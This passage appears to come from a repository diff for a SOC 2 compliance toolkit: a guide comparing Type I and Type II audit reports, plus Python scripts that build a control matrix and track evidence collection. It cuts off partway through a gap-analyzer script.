| CC3 (Risk Assessment) | A.8.2 (Risk) | ID.RA | Risk Analysis | Req 12.2 |
| CC4 (Monitoring) | A.8.34 (Monitoring) | DE.CM | Audit Controls | Req 10 |
| CC5 (Control Activities) | A.5-A.8 | PR | All Safeguards | Multiple |
| CC6 (Logical/Physical Access) | A.5.15, A.7 | PR.AC | Access Controls | Req 7-9 |
| CC7 (System Operations) | A.8.8, A.8.15 | DE, RS | Technical Safeguards | Req 5-6, 11 |
| CC8 (Change Management) | A.8.32 | PR.IP | Change Management | Req 6.4 |
| CC9 (Risk Mitigation) | A.5.19-5.22 | ID.SC | Business Associate Agreements | Req 12.8 |
| A1 (Availability) | A.8.13-14 | PR.IP | Contingency Plan | Req 12.10 |
| C1 (Confidentiality) | A.5.13-14, A.8.10-12 | PR.DS | Access Controls | Req 3-4 |
| PI1 (Processing Integrity) | A.8.24-25 | PR.DS | Integrity Controls | Req 6.5 |
| P1-P8 (Privacy) | A.5.34 (Privacy) | PR.PT | Privacy Rule | N/A |

---
<!-- File: references/type1_vs_type2.md -->
# SOC 2 Type I vs Type II Comparison
Detailed guide for understanding the differences between SOC 2 Type I and Type II reports, selecting the right starting point, planning timelines, and managing the upgrade path.
---
## Overview
| Dimension | Type I | Type II |
|-----------|--------|---------|
| **Full Name** | SOC 2 Type I Report | SOC 2 Type II Report |
| **What It Tests** | Design of controls at a specific point in time | Design AND operating effectiveness over a period |
| **Observation Period** | None — single date | 3-12 months (6 months typical) |
| **Auditor Opinion** | "Controls are suitably designed as of [date]" | "Controls are suitably designed and operating effectively for the period [start] to [end]" |
| **Evidence Volume** | Lower — policies, configs, descriptions | Higher — ongoing logs, tickets, samples across the period |
| **Timeline to Complete** | 1-3 months (prep + audit) | 6-15 months (prep + observation + audit) |
| **Audit Fee Range** | $20K-$50K | $30K-$100K+ |
| **Internal Cost** | $50K-$150K (implementation + audit) | $100K-$300K+ (implementation + monitoring + audit) |
| **Market Perception** | "They have controls" | "Their controls actually work" |
| **Validity** | Snapshot — stale quickly | Covers a defined period; renewed annually |
---
## When to Start with Type I
Type I is the right starting point when:
1. **First SOC 2 engagement** — You need to validate control design before investing in a full observation period
2. **Rapid market need** — A customer or deal requires SOC 2 assurance within 3 months
3. **Building the program** — Your compliance program is new and you want a structured assessment
4. **Budget constraints** — Type I costs significantly less and helps justify future Type II investment
5. **Control maturity is low** — You are still implementing controls and need a milestone before Type II
### Type I Limitations
- **Short shelf life** — Enterprise customers often ask "When is your Type II coming?"
- **No operating proof** — Does not demonstrate that controls work consistently
- **Annual deals may require Type II** — Many procurement teams mandate Type II for contracts above a threshold
- **Repeated cost** — If you plan to go Type II anyway, Type I is an additional expense
---
## When to Go Directly to Type II
Skip Type I and go directly to Type II when:
1. **Controls are already mature** — You have been operating security controls for 6+ months
2. **Customer requirements** — Your target customers explicitly require Type II
3. **Competitive pressure** — Competitors already have Type II reports
4. **Existing framework** — You already have ISO 27001 or similar, and controls are mapped
5. **Budget allows it** — You can absorb the longer timeline and higher cost
---
## Timeline Comparison
### Type I Timeline (Typical: 3-4 Months)
```
Month 1-2: Gap Assessment + Remediation
├── Assess current controls against TSC
├── Implement missing controls
├── Document policies and procedures
└── Assign control owners
Month 3: Audit Execution
├── Auditor reviews control descriptions
├── Auditor inspects configurations and policies
├── Management provides representation letter
└── Report issued
```
### Type II Timeline (Typical: 9-15 Months)
```
Month 1-3: Gap Assessment + Remediation
├── Assess current controls against TSC
├── Implement missing controls
├── Document policies and procedures
├── Set up evidence collection processes
└── Assign control owners
Month 4-9: Observation Period (6 months minimum)
├── Controls operate normally
├── Evidence is collected continuously
├── Periodic internal reviews
├── Address any control failures
└── Maintain documentation
Month 10-12: Audit Execution
├── Auditor tests operating effectiveness
├── Auditor samples evidence across the period
├── Exceptions documented and evaluated
├── Management provides representation letter
└── Report issued
```
### Accelerated Type II (Bridge from Type I)
```
Month 1-3: Type I Audit
├── Complete Type I assessment
├── Receive Type I report
└── Begin observation period immediately
Month 4-9: Observation Period
├── Controls operate with evidence collection
├── Address any Type I findings
└── Prepare for Type II testing
Month 10-12: Type II Audit
├── Auditor tests operating effectiveness
└── Type II report issued
```
---
## Cost Breakdown
### Type I Costs
| Cost Category | Range | Notes |
|--------------|-------|-------|
| Readiness assessment | $5K-$15K | Optional, but recommended for first-timers |
| Gap remediation | $10K-$50K | Depends on current maturity |
| Audit firm fees | $20K-$50K | Varies by scope, firm, and company size |
| Internal labor | $20K-$60K | Staff time for preparation and audit support |
| Tooling | $0-$20K | Compliance platforms, evidence management |
| **Total** | **$55K-$195K** | |
### Type II Costs
| Cost Category | Range | Notes |
|--------------|-------|-------|
| Readiness assessment | $5K-$15K | If not already done for Type I |
| Gap remediation | $15K-$75K | More thorough than Type I |
| Observation period monitoring | $10K-$30K | Internal effort for evidence collection |
| Audit firm fees | $30K-$100K+ | Larger scope, more testing |
| Internal labor | $40K-$120K | Ongoing effort across the observation period |
| Tooling | $5K-$40K | Compliance platforms, automation tools |
| **Total** | **$105K-$380K** | |
### Annual Renewal Costs (Type II)
| Cost Category | Range |
|--------------|-------|
| Audit firm fees | $25K-$80K |
| Internal labor | $30K-$80K |
| Tooling renewal | $5K-$30K |
| Remediation (if findings) | $5K-$30K |
| **Total** | **$65K-$220K** |
---
## Upgrade Path: Type I to Type II
### Step 1: Receive Type I Report
Review the Type I report for:
- Any exceptions or findings
- Auditor recommendations
- Control gaps identified during testing
- Areas where design could be strengthened
### Step 2: Address Type I Findings
- Remediate any exceptions before starting the observation period
- Strengthen control design based on auditor feedback
- Document all changes and their effective dates
### Step 3: Begin Observation Period
- Start the clock on your observation period (minimum 3 months, recommend 6)
- Implement evidence collection automation
- Assign control owners and review cadences
- Document any control changes during the period
### Step 4: Maintain During Observation
- Conduct monthly internal control reviews
- Track and remediate any control failures
- Keep evidence organized and timestamped
- Prepare for auditor walkthroughs
### Step 5: Type II Audit
- Auditor tests a sample of evidence across the observation period
- Auditor evaluates operating effectiveness
- Exceptions are documented with management responses
- Type II report issued
---
## What Auditors Test Differently
### Type I Testing
| Test | What the Auditor Does |
|------|----------------------|
| Inquiry | Asks control owners to describe how controls work |
| Inspection | Reviews policies, configurations, and documentation |
| Observation | May watch a control being executed (single instance) |
### Type II Additional Testing
| Test | What the Auditor Does |
|------|----------------------|
| Re-performance | Re-executes the control to verify it works correctly |
| Sampling | Selects samples from the full observation period |
| Walkthroughs | Traces a transaction end-to-end through all controls |
| Exception testing | Investigates any deviations found in samples |
| Consistency checks | Verifies controls operated the same way throughout the period |
---
## Report Distribution and Use
### Who Receives the Report
SOC 2 reports are **restricted-use documents** under AICPA standards:
- Your organization (the service organization)
- Your auditor
- User entities (customers) and their auditors
- Prospective customers under NDA
### Report Shelf Life
| Report Type | Practical Validity | Market Expectation |
|-------------|-------------------|-------------------|
| Type I | 6-12 months | Replace with Type II within 12 months |
| Type II | 12 months from period end | Renew annually; gap > 3 months raises concerns |
### Bridge Letters
If there is a gap between your report period end and a customer's request date, you may issue a **bridge letter** (also called a gap letter) stating:
- No material changes to the system since the report period
- No known control failures since the report period
- Management's assertion that controls continue to operate effectively
---
## Decision Framework
```
START
├─ Do you have existing controls operating for 6+ months?
│ ├─ YES → Do customers require Type II specifically?
│ │ ├─ YES → Go directly to Type II
│ │ └─ NO → Type I first (lower risk, validates design)
│ └─ NO → Type I first (build foundation)
├─ Is there an urgent deal requiring SOC 2 in < 4 months?
│ ├─ YES → Type I (fastest path to a report)
│ └─ NO → Evaluate maturity and go Type I or Type II
└─ Budget available for full Type II program?
├─ YES → Consider direct Type II if controls are mature
└─ NO → Type I first, budget Type II for next fiscal year
```
---
## Common Mistakes in the Upgrade Path
| Mistake | Consequence | Prevention |
|---------|------------|-----------|
| Starting observation before fixing Type I findings | Findings carry into Type II as exceptions | Remediate all Type I findings first |
| Choosing a 3-month observation period | Less convincing to customers; some reject < 6 months | Default to 6-month minimum observation |
| Changing auditors between Type I and Type II | New auditor must re-learn your environment; potential scope changes | Use the same firm for continuity |
| Not collecting evidence from day one of observation | Missing evidence for early-period controls | Start automated collection before observation begins |
| Treating the observation period as passive | Control failures go undetected until audit | Conduct monthly internal reviews during observation |
| Letting the Type I report expire before Type II is ready | Gap in coverage erodes customer confidence | Plan Type II timeline to overlap with Type I validity |

View File

@@ -0,0 +1,679 @@
#!/usr/bin/env python3
"""
SOC 2 Control Matrix Builder
Generates a SOC 2 control matrix from selected Trust Service Criteria categories.
Outputs in markdown, JSON, or CSV format.
Usage:
python control_matrix_builder.py --categories security --format md
python control_matrix_builder.py --categories security,availability --format json
python control_matrix_builder.py --categories security,availability,confidentiality,processing-integrity,privacy --format csv
"""
import argparse
import csv
import io
import json
import sys
from typing import Dict, List, Any
# Trust Service Criteria control definitions.
#
# Each control is stored as a compact row and expanded into the dict shape
# consumed by build_matrix(), so adding or editing a control is one line
# instead of a seven-line dict literal.  Row values follow _CONTROL_FIELDS
# order: (id, tsc, description, type, frequency, evidence).
_CONTROL_FIELDS = ("id", "tsc", "description", "type", "frequency", "evidence")


def _expand(rows: List[tuple]) -> List[Dict[str, str]]:
    """Expand compact control rows into the dict form used throughout the tool."""
    return [dict(zip(_CONTROL_FIELDS, row)) for row in rows]


TSC_CONTROLS: Dict[str, Dict[str, Any]] = {
    "security": {
        "name": "Security (Common Criteria)",
        "controls": _expand([
            ("SEC-001", "CC1.1", "Management demonstrates commitment to integrity and ethical values", "Preventive", "Annual", "Code of conduct, ethics policy, signed acknowledgments"),
            ("SEC-002", "CC1.2", "Board of directors demonstrates independence and exercises oversight", "Preventive", "Quarterly", "Board meeting minutes, oversight committee charters"),
            ("SEC-003", "CC1.3", "Management establishes organizational structure, reporting lines, and authorities", "Preventive", "Annual", "Org charts, RACI matrices, role descriptions"),
            ("SEC-004", "CC1.4", "Organization demonstrates commitment to attract, develop, and retain competent individuals", "Preventive", "Annual", "Training records, competency assessments, HR policies"),
            ("SEC-005", "CC1.5", "Organization holds individuals accountable for internal control responsibilities", "Preventive", "Annual", "Performance reviews, disciplinary policy, accountability matrix"),
            ("SEC-006", "CC2.1", "Organization obtains and generates relevant quality information to support internal control", "Detective", "Continuous", "Information classification policy, data flow diagrams"),
            ("SEC-007", "CC2.2", "Organization internally communicates objectives and responsibilities for internal control", "Preventive", "Quarterly", "Internal communications, policy distribution records, training materials"),
            ("SEC-008", "CC2.3", "Organization communicates with external parties regarding matters affecting internal control", "Preventive", "Continuous", "Customer notifications, external communication policy, incident notices"),
            ("SEC-009", "CC3.1", "Organization specifies objectives to identify and assess risks", "Preventive", "Annual", "Risk assessment methodology, risk register, risk appetite statement"),
            ("SEC-010", "CC3.2", "Organization identifies and analyzes risks to achievement of objectives", "Detective", "Annual", "Risk assessment report, threat modeling documentation"),
            ("SEC-011", "CC3.3", "Organization considers potential for fraud in assessing risks", "Detective", "Annual", "Fraud risk assessment, anti-fraud controls documentation"),
            ("SEC-012", "CC3.4", "Organization identifies and assesses changes that could impact internal control", "Detective", "Quarterly", "Change impact assessments, environmental scan reports"),
            ("SEC-013", "CC4.1", "Organization selects and performs ongoing and separate monitoring evaluations", "Detective", "Continuous", "Monitoring dashboards, automated alert configurations, review logs"),
            ("SEC-014", "CC4.2", "Organization evaluates and communicates internal control deficiencies", "Corrective", "Quarterly", "Deficiency tracking log, management reports, remediation plans"),
            ("SEC-015", "CC5.1", "Organization selects and develops control activities that mitigate risks", "Preventive", "Annual", "Control matrix, risk treatment plans, control design documentation"),
            ("SEC-016", "CC5.2", "Organization selects and develops general control activities over technology", "Preventive", "Continuous", "IT general controls documentation, technology policies"),
            ("SEC-017", "CC5.3", "Organization deploys control activities through policies and procedures", "Preventive", "Annual", "Policy library, procedure documents, acknowledgment records"),
            ("SEC-018", "CC6.1", "Logical access security controls over protected information assets", "Preventive", "Continuous", "Access control policy, IAM configuration, SSO/MFA settings"),
            ("SEC-019", "CC6.2", "User access provisioning based on role and business need", "Preventive", "Continuous", "Provisioning tickets, role matrix, access request approvals"),
            ("SEC-020", "CC6.3", "User access removal upon termination or role change", "Preventive", "Continuous", "Deprovisioning tickets, termination checklists, access removal logs"),
            ("SEC-021", "CC6.4", "Periodic access reviews to validate appropriateness", "Detective", "Quarterly", "Access review reports, user entitlement listings, review sign-offs"),
            ("SEC-022", "CC6.5", "Physical access restrictions to facilities and protected assets", "Preventive", "Continuous", "Badge access logs, visitor logs, physical security configuration"),
            ("SEC-023", "CC6.6", "Encryption of data in transit and at rest", "Preventive", "Continuous", "TLS configuration, encryption settings, certificate inventory"),
            ("SEC-024", "CC6.7", "Restrictions on data transmission and movement", "Preventive", "Continuous", "DLP configuration, network segmentation, firewall rules"),
            ("SEC-025", "CC6.8", "Controls to prevent or detect unauthorized software", "Detective", "Continuous", "Endpoint protection config, software whitelist, malware scan reports"),
            ("SEC-026", "CC7.1", "Vulnerability identification and management", "Detective", "Weekly", "Vulnerability scan reports, remediation SLAs, patch records"),
            ("SEC-027", "CC7.2", "Monitoring for anomalies and security events", "Detective", "Continuous", "SIEM configuration, alert rules, monitoring dashboards"),
            ("SEC-028", "CC7.3", "Security event evaluation and incident classification", "Detective", "Continuous", "Incident classification criteria, triage procedures, event logs"),
            ("SEC-029", "CC7.4", "Incident response execution and recovery", "Corrective", "Continuous", "Incident response plan, incident tickets, postmortem reports"),
            ("SEC-030", "CC7.5", "Incident recovery and lessons learned", "Corrective", "Continuous", "Recovery records, lessons learned documentation, plan updates"),
            ("SEC-031", "CC8.1", "Change management authorization and testing", "Preventive", "Continuous", "Change tickets, approval records, test results, deployment logs"),
            ("SEC-032", "CC9.1", "Vendor and business partner risk management", "Preventive", "Annual", "Vendor risk assessments, vendor register, SOC 2 reports from vendors"),
            ("SEC-033", "CC9.2", "Risk mitigation through insurance and other transfer mechanisms", "Preventive", "Annual", "Insurance policies, risk transfer documentation"),
        ]),
    },
    "availability": {
        "name": "Availability",
        "controls": _expand([
            ("AVL-001", "A1.1", "Capacity management and infrastructure scaling", "Preventive", "Continuous", "Capacity monitoring dashboards, scaling policies, resource utilization reports"),
            ("AVL-002", "A1.1", "System performance monitoring and SLA tracking", "Detective", "Continuous", "Uptime reports, SLA dashboards, performance metrics"),
            ("AVL-003", "A1.2", "Data backup procedures and verification", "Preventive", "Daily", "Backup logs, backup success/failure reports, retention configuration"),
            ("AVL-004", "A1.2", "Disaster recovery planning and documentation", "Preventive", "Annual", "DR plan, BCP documentation, recovery procedures"),
            ("AVL-005", "A1.2", "Business continuity management and communication", "Preventive", "Annual", "BCP plan, communication tree, emergency contacts"),
            ("AVL-006", "A1.3", "Disaster recovery testing and validation", "Detective", "Annual", "DR test results, RTO/RPO measurements, test reports"),
            ("AVL-007", "A1.3", "Failover testing and redundancy validation", "Detective", "Quarterly", "Failover test records, redundancy configuration, test results"),
        ]),
    },
    "confidentiality": {
        "name": "Confidentiality",
        "controls": _expand([
            ("CON-001", "C1.1", "Data classification and labeling policy", "Preventive", "Annual", "Data classification policy, labeling standards, data inventory"),
            ("CON-002", "C1.1", "Confidential data inventory and mapping", "Detective", "Quarterly", "Data inventory, data flow diagrams, system classification"),
            ("CON-003", "C1.2", "Encryption of confidential data at rest and in transit", "Preventive", "Continuous", "Encryption configuration, TLS settings, key management procedures"),
            ("CON-004", "C1.2", "Access restrictions to confidential information", "Preventive", "Continuous", "Access control lists, need-to-know policy, access review records"),
            ("CON-005", "C1.2", "Data loss prevention controls", "Detective", "Continuous", "DLP configuration, DLP alerts/incidents, exception approvals"),
            ("CON-006", "C1.3", "Secure data disposal and media sanitization", "Preventive", "Continuous", "Disposal procedures, sanitization certificates, destruction logs"),
            ("CON-007", "C1.3", "Data retention enforcement and schedule compliance", "Preventive", "Quarterly", "Retention schedule, deletion logs, retention compliance reports"),
        ]),
    },
    "processing-integrity": {
        "name": "Processing Integrity",
        "controls": _expand([
            ("PRI-001", "PI1.1", "Input validation and data accuracy controls", "Preventive", "Continuous", "Validation rules, input sanitization config, error handling logs"),
            ("PRI-002", "PI1.1", "Output verification and data integrity checks", "Detective", "Continuous", "Reconciliation reports, checksum verification, output validation logs"),
            ("PRI-003", "PI1.2", "Transaction completeness monitoring", "Detective", "Continuous", "Transaction logs, reconciliation reports, completeness dashboards"),
            ("PRI-004", "PI1.2", "Error handling and exception management", "Corrective", "Continuous", "Error logs, exception handling procedures, retry mechanisms"),
            ("PRI-005", "PI1.3", "Processing timeliness and SLA monitoring", "Detective", "Continuous", "SLA reports, processing time metrics, batch job monitoring"),
            ("PRI-006", "PI1.4", "Processing authorization and segregation of duties", "Preventive", "Continuous", "Authorization matrix, SoD controls, approval workflows"),
        ]),
    },
    "privacy": {
        "name": "Privacy",
        "controls": _expand([
            ("PRV-001", "P1.1", "Privacy notice publication and data collection transparency", "Preventive", "Annual", "Privacy policy, data collection notices, purpose statements"),
            ("PRV-002", "P2.1", "Consent management and preference tracking", "Preventive", "Continuous", "Consent records, opt-in/opt-out mechanisms, preference center"),
            ("PRV-003", "P3.1", "Data minimization and lawful collection", "Preventive", "Continuous", "Data collection audit, purpose limitation documentation, lawful basis records"),
            ("PRV-004", "P4.1", "Purpose limitation and use restrictions", "Preventive", "Continuous", "Data use policy, purpose limitation controls, access restrictions"),
            ("PRV-005", "P4.2", "Data retention schedules and disposal procedures", "Preventive", "Quarterly", "Retention schedule, deletion logs, disposal certificates"),
            ("PRV-006", "P5.1", "Data subject access request (DSAR) processing", "Corrective", "Continuous", "DSAR log, response records, processing timelines"),
            ("PRV-007", "P5.2", "Data correction and rectification rights", "Corrective", "Continuous", "Correction request records, data update logs"),
            ("PRV-008", "P6.1", "Third-party data sharing controls and notifications", "Preventive", "Continuous", "Data sharing agreements, third-party inventory, DPAs"),
            ("PRV-009", "P6.2", "Breach notification procedures", "Corrective", "Continuous", "Breach response plan, notification templates, incident records"),
            ("PRV-010", "P7.1", "Data quality and accuracy verification", "Detective", "Quarterly", "Data quality reports, accuracy checks, correction logs"),
            ("PRV-011", "P8.1", "Privacy program monitoring and compliance reviews", "Detective", "Quarterly", "Privacy audits, compliance dashboards, complaint tracking"),
        ]),
    },
}
VALID_CATEGORIES = list(TSC_CONTROLS.keys())
def build_matrix(categories: List[str]) -> List[Dict[str, str]]:
    """Assemble control-matrix rows for the requested TSC categories.

    Unrecognized category names are silently skipped here; user input is
    validated in main() before this function is called.  Every row starts
    with owner "TBD" and status "Not Started".
    """
    rows: List[Dict[str, str]] = []
    for name in categories:
        category = TSC_CONTROLS.get(name)
        if category is None:
            continue
        rows.extend(
            {
                "control_id": control["id"],
                "tsc_criteria": control["tsc"],
                "category": category["name"],
                "description": control["description"],
                "control_type": control["type"],
                "frequency": control["frequency"],
                "evidence_required": control["evidence"],
                "owner": "TBD",
                "status": "Not Started",
            }
            for control in category["controls"]
        )
    return rows
def format_markdown(matrix: List[Dict[str, str]]) -> str:
    """Render the control matrix as a markdown table with a total-count footer."""
    # Column order must match the header row below.
    field_order = (
        "control_id",
        "tsc_criteria",
        "category",
        "description",
        "control_type",
        "frequency",
        "evidence_required",
        "owner",
        "status",
    )
    out = [
        "# SOC 2 Control Matrix",
        "",
        "| Control ID | TSC | Category | Description | Type | Frequency | Evidence | Owner | Status |",
        "|------------|-----|----------|-------------|------|-----------|----------|-------|--------|",
    ]
    for entry in matrix:
        cells = " | ".join(entry[field] for field in field_order)
        out.append(f"| {cells} |")
    out.append("")
    out.append(f"**Total Controls:** {len(matrix)}")
    return "\n".join(out)
def format_csv(matrix: List[Dict[str, str]]) -> str:
    """Render the control matrix as CSV text (header row + one row per control).

    Returns an empty string when the matrix is empty, since there is no
    header to derive field names from.
    """
    if not matrix:
        return ""
    buffer = io.StringIO()
    # Field names come from the first row; build_matrix emits uniform keys.
    writer = csv.DictWriter(buffer, fieldnames=list(matrix[0].keys()))
    writer.writeheader()
    for row in matrix:
        writer.writerow(row)
    return buffer.getvalue()
def format_json(matrix: List[Dict[str, str]]) -> str:
    """Render the control matrix as pretty-printed JSON with a total count."""
    payload = {"controls": matrix, "total": len(matrix)}
    return json.dumps(payload, indent=2)
def main() -> None:
    """CLI entry point: parse arguments, build the control matrix, print it.

    Exits with status 1 (and a message on stderr) for invalid category
    names or an empty result.
    """
    parser = argparse.ArgumentParser(
        description="SOC 2 Control Matrix Builder — generates control matrices from selected Trust Service Criteria categories."
    )
    parser.add_argument(
        "--categories",
        type=str,
        required=True,
        help=f"Comma-separated TSC categories: {','.join(VALID_CATEGORIES)}",
    )
    parser.add_argument(
        "--format",
        type=str,
        choices=["md", "json", "csv"],
        default="md",
        help="Output format (default: md)",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        help="Shorthand for --format json",
    )
    args = parser.parse_args()
    # Normalize, then de-duplicate while preserving first-seen order, so
    # e.g. "--categories security,security" does not emit every control twice.
    categories = list(dict.fromkeys(c.strip().lower() for c in args.categories.split(",")))
    invalid = [c for c in categories if c not in VALID_CATEGORIES]
    if invalid:
        print(
            f"Error: Invalid categories: {', '.join(invalid)}. Valid options: {', '.join(VALID_CATEGORIES)}",
            file=sys.stderr,
        )
        sys.exit(1)
    # Build matrix
    matrix = build_matrix(categories)
    if not matrix:
        print("No controls found for the selected categories.", file=sys.stderr)
        sys.exit(1)
    # Output: the --json shorthand takes precedence over --format.
    fmt = "json" if args.json else args.format
    if fmt == "md":
        print(format_markdown(matrix))
    elif fmt == "json":
        print(format_json(matrix))
    elif fmt == "csv":
        print(format_csv(matrix))
if __name__ == "__main__":
main()

View File

@@ -0,0 +1,240 @@
#!/usr/bin/env python3
"""
SOC 2 Evidence Tracker
Tracks evidence collection status per control in a SOC 2 control matrix.
Reads a JSON control matrix (from control_matrix_builder.py) and reports
collection completeness, overdue items, and readiness scoring.
Usage:
python evidence_tracker.py --matrix controls.json --status
python evidence_tracker.py --matrix controls.json --status --json
"""
import argparse
import json
import sys
from datetime import datetime
from typing import Dict, List, Any
# Evidence status classifications
# Canonical lifecycle states for a control's evidence, each mapped to a
# short human-readable explanation.  classify_evidence_status() normalizes
# free-form status strings onto these keys, and the status report counts
# controls per key.
EVIDENCE_STATUSES = {
    "collected": "Evidence gathered and verified",
    "pending": "Evidence identified but not yet collected",
    "overdue": "Evidence past its collection deadline",
    "not_started": "No evidence collection initiated",
    "not_applicable": "Control not applicable to the environment",
}
# Expected evidence fields for a well-formed control entry
# (matches the row keys emitted by control_matrix_builder.py); entries
# missing any of these are flagged as issues in the status report.
REQUIRED_FIELDS = ["control_id", "tsc_criteria", "description", "evidence_required"]
def load_matrix(filepath: str) -> List[Dict[str, Any]]:
    """Read a control matrix from a JSON file and return the control list.

    Accepts either the ``{"controls": [...]}`` envelope emitted by
    control_matrix_builder.py or a bare JSON array of control entries.
    Exits with status 1 (message on stderr) on a missing file, malformed
    JSON, or an unexpected top-level shape.
    """
    try:
        with open(filepath, "r") as handle:
            payload = json.load(handle)
    except FileNotFoundError:
        print(f"Error: File not found: {filepath}", file=sys.stderr)
        sys.exit(1)
    except json.JSONDecodeError as exc:
        print(f"Error: Invalid JSON in {filepath}: {exc}", file=sys.stderr)
        sys.exit(1)
    # Unwrap either accepted top-level shape.
    if isinstance(payload, list):
        return payload
    if isinstance(payload, dict) and "controls" in payload:
        return payload["controls"]
    print(
        "Error: Expected JSON with 'controls' array or a plain array.",
        file=sys.stderr,
    )
    sys.exit(1)
def classify_evidence_status(control: Dict[str, Any]) -> str:
    """Normalize a control's free-form status onto one of the tracker's
    canonical evidence states.

    A pending-style status with an ``evidence_date`` (YYYY-MM-DD) in the
    past is promoted to "overdue"; unparseable or absent dates leave it
    "pending".  Anything unrecognized falls through to "not_started".
    """
    raw = control.get("status", "Not Started").lower().strip()
    due_text = control.get("evidence_date", "")

    if raw in ("not_applicable", "n/a", "not applicable"):
        return "not_applicable"
    if raw in ("collected", "complete", "done"):
        return "collected"
    if raw in ("overdue", "late"):
        return "overdue"
    if raw in ("pending", "in progress", "in_progress"):
        if due_text:
            try:
                deadline = datetime.strptime(due_text, "%Y-%m-%d")
            except ValueError:
                # Malformed date: keep the declared status rather than guess.
                return "pending"
            if deadline < datetime.now():
                return "overdue"
        return "pending"
    return "not_started"
def generate_status_report(controls: List[Dict[str, Any]]) -> Dict[str, Any]:
    """Generate an evidence collection status report.

    Tallies per-status and per-category counts, flags overdue or
    not-started controls plus entries missing REQUIRED_FIELDS, and
    derives a readiness score over the applicable (non-N/A) controls.

    Args:
        controls: List of control entries from the matrix.

    Returns:
        Dict with "summary" (counts, score, rating, date),
        "by_category" (per-category status counts), and "issues".
    """
    total = len(controls)
    status_counts = dict.fromkeys(EVIDENCE_STATUSES, 0)
    by_category: Dict[str, Dict[str, int]] = {}
    issues: List[Dict[str, str]] = []

    for ctrl in controls:
        status = classify_evidence_status(ctrl)
        status_counts[status] = status_counts.get(status, 0) + 1

        bucket = by_category.setdefault(
            ctrl.get("category", "Unknown"), dict.fromkeys(EVIDENCE_STATUSES, 0)
        )
        bucket[status] += 1

        # Flag actionable issues per control.
        if status == "overdue":
            issues.append(
                {
                    "control_id": ctrl.get("control_id", "N/A"),
                    "tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
                    "description": ctrl.get("description", "N/A"),
                    "issue": "Evidence collection overdue",
                    "evidence_date": ctrl.get("evidence_date", "N/A"),
                }
            )
        elif status == "not_started":
            issues.append(
                {
                    "control_id": ctrl.get("control_id", "N/A"),
                    "tsc_criteria": ctrl.get("tsc_criteria", "N/A"),
                    "description": ctrl.get("description", "N/A"),
                    "issue": "Evidence collection not started",
                }
            )

        # Missing or empty required fields also count as issues.
        absent = [field for field in REQUIRED_FIELDS if not ctrl.get(field)]
        if absent:
            issues.append(
                {
                    "control_id": ctrl.get("control_id", "N/A"),
                    "issue": f"Missing fields: {', '.join(absent)}",
                }
            )

    # Readiness = collected / applicable; N/A controls don't count against us.
    applicable = total - status_counts.get("not_applicable", 0)
    collected = status_counts.get("collected", 0)
    readiness_pct = round(collected / applicable * 100, 1) if applicable > 0 else 0.0

    readiness_rating = "Not Ready"
    for threshold, rating in ((90, "Audit Ready"), (75, "Minor Gaps"), (50, "Significant Gaps")):
        if readiness_pct >= threshold:
            readiness_rating = rating
            break

    return {
        "summary": {
            "total_controls": total,
            "status_breakdown": status_counts,
            "readiness_score": readiness_pct,
            "readiness_rating": readiness_rating,
            "report_date": datetime.now().strftime("%Y-%m-%d"),
        },
        "by_category": by_category,
        "issues": issues,
    }
def format_status_text(report: Dict[str, Any]) -> str:
    """Format the status report as human-readable text.

    Renders the summary header, per-status breakdown, per-category
    collection percentages, and the issue list (or a no-issues banner).
    """
    summary = report["summary"]
    out: List[str] = ["=" * 60, "SOC 2 Evidence Collection Status Report", "=" * 60, ""]
    out.append(f"Report Date: {summary['report_date']}")
    out.append(f"Total Controls: {summary['total_controls']}")
    out.append(
        f"Readiness Score: {summary['readiness_score']}% ({summary['readiness_rating']})"
    )
    out.append("")

    # Per-status counts with their human-readable labels.
    out.append("--- Status Breakdown ---")
    for status, count in summary["status_breakdown"].items():
        label = EVIDENCE_STATUSES.get(status, status)
        out.append(f"  {status:15s}: {count:3d} ({label})")
    out.append("")

    # Collected-vs-total percentage per category.
    out.append("--- By Category ---")
    for cat, statuses in report["by_category"].items():
        cat_total = sum(statuses.values())
        cat_collected = statuses.get("collected", 0)
        cat_pct = round(cat_collected / cat_total * 100, 1) if cat_total > 0 else 0
        out.append(f"  {cat}: {cat_collected}/{cat_total} collected ({cat_pct}%)")
    out.append("")

    issues = report["issues"]
    if issues:
        out.append(f"--- Issues ({len(issues)}) ---")
        for issue in issues:
            out.append(f"  [{issue.get('control_id', 'N/A')}] {issue.get('issue', 'Unknown issue')}")
    else:
        out.append("--- No Issues Found ---")
    out.append("")
    return "\n".join(out)
def main():
    """CLI entry point: parse arguments, load the matrix, print the report."""
    parser = argparse.ArgumentParser(
        description="SOC 2 Evidence Tracker — tracks evidence collection status per control."
    )
    parser.add_argument(
        "--matrix",
        type=str,
        required=True,
        help="Path to JSON control matrix file (from control_matrix_builder.py)",
    )
    parser.add_argument(
        "--status",
        action="store_true",
        help="Generate evidence collection status report",
    )
    parser.add_argument(
        "--json",
        action="store_true",
        help="Output in JSON format",
    )
    args = parser.parse_args()

    # --status is the only supported mode; fail fast when it's absent.
    if not args.status:
        parser.print_help()
        print("\nError: --status flag is required.", file=sys.stderr)
        sys.exit(1)

    report = generate_status_report(load_matrix(args.matrix))
    print(json.dumps(report, indent=2) if args.json else format_status_text(report))


if __name__ == "__main__":
    main()

View File

@@ -0,0 +1,479 @@
#!/usr/bin/env python3
"""
SOC 2 Gap Analyzer
Analyzes current controls against SOC 2 Trust Service Criteria requirements
and identifies gaps. Supports both Type I (design) and Type II (design +
operating effectiveness) analysis.
Usage:
python gap_analyzer.py --controls current_controls.json --type type1
python gap_analyzer.py --controls current_controls.json --type type2 --json
"""
import argparse
import json
import sys
from datetime import datetime
from typing import Dict, List, Any, Tuple
# Minimum required TSC criteria coverage per category.
# Keys are the five Trust Service Categories; each maps criterion IDs
# (CC*/A*/C*/PI*/P*) to a short description. detect_categories() and
# analyze_coverage() treat these as the complete set a control matrix
# must address for each category in scope.
REQUIRED_TSC: Dict[str, Dict[str, str]] = {
    "security": {
        "CC1.1": "Integrity and ethical values",
        "CC1.2": "Board oversight",
        "CC1.3": "Organizational structure",
        "CC1.4": "Competence commitment",
        "CC1.5": "Accountability",
        "CC2.1": "Information quality",
        "CC2.2": "Internal communication",
        "CC2.3": "External communication",
        "CC3.1": "Risk objectives",
        "CC3.2": "Risk identification",
        "CC3.3": "Fraud risk consideration",
        "CC3.4": "Change risk assessment",
        "CC4.1": "Monitoring evaluations",
        "CC4.2": "Deficiency communication",
        "CC5.1": "Control activities selection",
        "CC5.2": "Technology controls",
